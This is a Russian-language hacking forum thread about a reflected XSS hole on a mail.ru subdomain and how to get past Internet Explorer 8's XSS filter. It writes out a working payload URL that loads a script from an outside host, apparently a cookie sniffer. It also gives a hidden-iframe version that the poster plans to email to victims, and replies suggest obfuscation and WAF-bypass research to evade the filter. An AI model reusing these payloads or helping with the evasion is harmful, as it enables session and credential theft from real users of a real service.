Столкнулся с проблемой, что пассивка XSS не пробивает Internet Exporer 8

http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>

Блокируется выполнение сценариев

http://s42.radikal.ru/i097/0912/77/9c0dd48cbe56.jpg


кто как обходит защиту ИЕ 8 ?

Запарился уже кодировать :mad: , все остальные браузеры пробивает, а на ИЕ 8 полный тормоз.

зря пассивку спалил
пофиксят

пробывал тоже самое результата - ноль !

Ого о_0 она все еще пашет... ей уже как месяца 2 о_0

Ого о_0 она все еще пашет... ей уже как месяца 2 о_0
одна найденная мной в теме куда скидывались XSS от мейлру когда-то год мне прослужила

зря пассивку спалил
пофиксят

пассивку свою я выкладывать не стал, а взял наугад из темы пассивные ксс, дабы палева меньше было. так что это палевная пассивка, приведенная чисто для примера.

satana-fu, то что у вас на скрине - информационная панель. То что блокирует - xss-фильтр, присущий ie7-8.
Что вы пытаетесь кодировать?! XSS-фильтр можно отключиться в настройках, во вкладке безопасность. А обходится он при помощи js-обфускации, но с пассивными xss этот номер не пройдет.
Так что, если хотите увидеть результат в вашем конкретном примере - просто отключите фильтр.

upd:
p.s. а вообще, если бы вы кликнули мышью по этой выпавшей информационной панели - поняли бы все сами, т.к. там все прекрасно написанно!

А если совсем худо - то вот (http://forum.antichat.ru/showpost.php?p=1772191&postcount=5)


доберман, я прекрасно знаю, что у меня на скрине, а скрин сделал чтоб было общее понятие как блокируется.
кажется или я вопрос неправильно поставил или мне загодя неправильно отвечают.

смотри, я пытаюсь кодировать фрейм с пассивкой,
<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="http://11x11.mail.ru/?&url='"><script src=http://sniffer.ru/js.js></script>"></iframe>

закодировать его в яваскрипт, и дальше уже запускать в теле страницы скриптом <script src=закодированный.js></script> ан не пробивает, все равно распознается XSS

совет про отключение фильтра ваще не к месту))), иначе при отправке жертве письма с ксс, мне надо отправлять следующий текст "если у вас ИЕ 7-8, то отключите, пожалуйста, фильтр безопасности перед тем как перейдете по следующей ссылке." ? :D


p.s. а вообще, если бы вы кликнули мышью по этой выпавшей информационной панели - поняли бы все сами, т.к. там все прекрасно написанно!

мне надо было заскринить весь инструктаж по ксс, который выводится при клике мышкой?


весь вопрос заключается в том, как в ИЕ 8 запустить пассивную ксс при включенном фильтре, как заставить ссылку обработаться в ИЕ 8, а не в том, что такое ксс и с чем его кушать. :confused:

ps. за ссылку спасибо, пошел читать, может найду что нибудь полезное.

Обойти фильтр "при помощи js-обфускации" как советует товарищ dober.man не выйдет никоим образом. Ищите материал по обходу WAF (был то ли на конференции BlackHat, то ли в одном из отчётов об обходе WAF от Bitrix после проведения Chaos Constructions 2009). В нём было разобраны методы обхода mod_security, сухосин-патча и Анти-XSS фильтра в IE7. Ссылку дал бы, но не помню где :) Так что - ищите.